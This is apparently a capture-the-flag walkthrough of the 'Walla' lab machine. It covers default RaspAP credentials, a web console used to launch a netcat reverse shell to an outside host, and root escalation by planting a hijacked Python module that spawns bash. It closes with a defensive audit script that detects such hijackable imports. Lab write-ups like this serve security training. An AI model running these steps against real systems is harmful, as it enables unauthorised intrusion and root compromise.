
PG: Walla | Walkthrough

November 23, 2021

Enumeration

Start with an Nmap scan, as usual:

$ nmap $ip -p22,23,25,53,8091 -sVC --version-all
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02:71:5d:c8:b9:43:ba:6a:c8:ed:15:c5:6c:b2:f5:f9 (RSA)
| 256 f3:e5:10:d4:16:a9:9e:03:47:38:ba:ac:18:24:53:28 (ECDSA)
|_ 256 02:4f:99:ec:85:6d:79:43:88:b2:b5:7c:f0:91:fe:74 (ED25519)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: walla, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
| ssl-cert: Subject: commonName=walla
| Subject Alternative Name: DNS:walla
| Not valid before: 2020-09-17T18:26:36
|_Not valid after: 2030-09-15T18:26:36
|_ssl-date: TLS randomness does not represent time
53/tcp open tcpwrapped
8091/tcp open http lighttpd 1.4.53
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=RaspAP
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: lighttpd/1.4.53
Service Info: Host: walla; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access

RaspAP - Misconfigured web console (AUTHENTICATED)

  • Log in to RaspAP with the default credentials admin:secret.
  • After logging in, the dashboard shows the version, which is 2.5.
  • https://github.com/gerbsec/CVE-2020-24572-POC
  • The /includes/webconsole.php endpoint gives access to the web console (a web shell).
  • From that console (user@192.168.63.97 ~$), run nc -e /bin/sh 192.168.49.63 8091 to get a reverse shell.

Privilege Escalation

Python Import Module Hijacking

  • Check the sudo privileges of www-data:

www-data@walla:/home/walter$ sudo -l
Matching Defaults entries for www-data on walla:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on walla:
(ALL) NOPASSWD: /sbin/ifup
(ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py
(ALL) NOPASSWD: /bin/systemctl start hostapd.service
(ALL) NOPASSWD: /bin/systemctl stop hostapd.service
(ALL) NOPASSWD: /bin/systemctl start dnsmasq.service
(ALL) NOPASSWD: /bin/systemctl stop dnsmasq.service
(ALL) NOPASSWD: /bin/systemctl restart dnsmasq.service

We have no write permission on wifi_reset.py, but we can read it:

www-data@walla:/home/walter$ cat wifi_reset.py
#!/usr/bin/python
import sys
try:
    import wificontroller
except Exception:
    print "[!] ERROR: Unable to load wificontroller module."
    sys.exit()

It imports the wificontroller module. Run the script:

www-data@walla:/home/walter$ sudo /usr/bin/python /home/walter/wifi_reset.py
[!] ERROR: Unable to load wificontroller module.

No module named wificontroller is present on the target machine, and we have write permission on the directory containing the Python script. Python puts the script's own directory first on its module search path (sys.path[0]), so a file created there is found before anything else. Create a Python module named wificontroller.py in that directory; it is imported, and therefore executed, as root when the script runs:

import os
# Module-level code runs at import time; under sudo that means as root.
print("Is this working?")
os.system("/bin/bash")

Run the script again to get a root shell:

www-data@walla:/home/walter$ sudo /usr//bin/python /home/walter/wifi_reset.py
Is this working?
root@walla:/home/walter# whoami
root
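As an added, defender-side example that is not part of the original walkthrough: a small audit script that reads sudo -l output, finds NOPASSWD Python scripts, and reports every non-builtin import that the invoking user could shadow because the script's directory is writable (the exact condition abused above). The fixture directory, the sudoers lines and the copy of wifi_reset.py are constructed here to mirror the box's layout, and the function names are my own.

```python
import os
import re
import sys
import tempfile
from pathlib import Path

# "(ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py" -> (interpreter, script)
SUDO_PY_RE = re.compile(r"\(\S+\)\s+(?:NOPASSWD:\s*)?(\S*python[0-9.]*)\s+(\S+\.py)\b")
IMPORT_RE = re.compile(r"^\s*(?:import|from)\s+([A-Za-z_]\w*)", re.MULTILINE)  # top-level names

def hijackable_imports(sudo_output, fs_root="/"):
    """One finding per sudo-runnable Python script whose directory we can write to:
    Python puts that directory at sys.path[0], so any non-builtin import is shadowable."""
    findings = []
    for m in SUDO_PY_RE.finditer(sudo_output):
        interpreter, script = m.group(1), m.group(2)
        script_path = Path(fs_root) / script.lstrip("/")
        script_dir = script_path.parent
        if not os.access(script_dir, os.W_OK):
            continue  # directory not writable by us: no hijack through sys.path[0]
        try:
            source = script_path.read_text()
        except OSError:
            source = ""  # unreadable script: the writable directory is still a finding
        modules = {mm.group(1) for mm in IMPORT_RE.finditer(source)}
        shadowable = sorted(modules - set(sys.builtin_module_names))
        findings.append({"interpreter": interpreter, "script": script,
                         "writable_dir": str(script_dir), "shadowable": shadowable})
    return findings

# Constructed fixtures mirroring the box: two sudo -l lines and the script as shown.
SUDO_L = """(ALL) NOPASSWD: /sbin/ifup
(ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py
"""
WIFI_RESET = """#!/usr/bin/python
import sys
try:
    import wificontroller
except Exception:
    print "[!] ERROR: Unable to load wificontroller module."
    sys.exit()
"""

def demo():
    root = tempfile.mkdtemp()  # throwaway fake filesystem root
    home = Path(root) / "home" / "walter"
    home.mkdir(parents=True)
    (home / "wifi_reset.py").write_text(WIFI_RESET)
    return hijackable_imports(SUDO_L, root)
```

On a real host, run it as the low-privilege user with the actual sudo -l text and fs_root="/"; the fix it points at is keeping root-run scripts in a root-owned directory (or, on Python 3.11+, running them with -P so the script directory is not added to sys.path).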